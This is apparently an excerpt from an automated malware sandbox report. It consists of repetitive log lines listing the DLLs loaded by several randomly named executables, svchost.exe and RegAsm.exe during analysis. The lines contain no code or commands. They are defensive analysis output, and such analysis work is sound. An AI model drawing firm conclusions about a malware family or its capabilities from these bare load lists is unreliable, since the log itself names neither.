                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: mscorjit.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\VkcBn13x2kmdo9AMRXP8qT_4.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\Documents\iofolko5\VkcBn13x2kmdo9AMRXP8qT_4.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeSection loaded: version.dll
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Documents\iofolko5\iXbjjIcri3rG3XH6GK7dHSLO.exeSection loaded: winmm.dll
                        Source: C:\Users\user\Documents\iofolko5\iXbjjIcri3rG3XH6GK7dHSLO.exeSection loaded: powrprof.dll
                        Source: C:\Users\user\Documents\iofolko5\iXbjjIcri3rG3XH6GK7dHSLO.exeSection loaded: umpdc.dll
                        Source: C:\Users\user\Documents\iofolko5\_U2YDEzm5f5t9soM_Qc1Hc4U.exeSection loaded: apphelp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edputil.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appresolver.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcp47langs.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: slc.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sppc.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pcacli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edputil.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appresolver.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcp47langs.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: slc.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sppc.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pcacli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
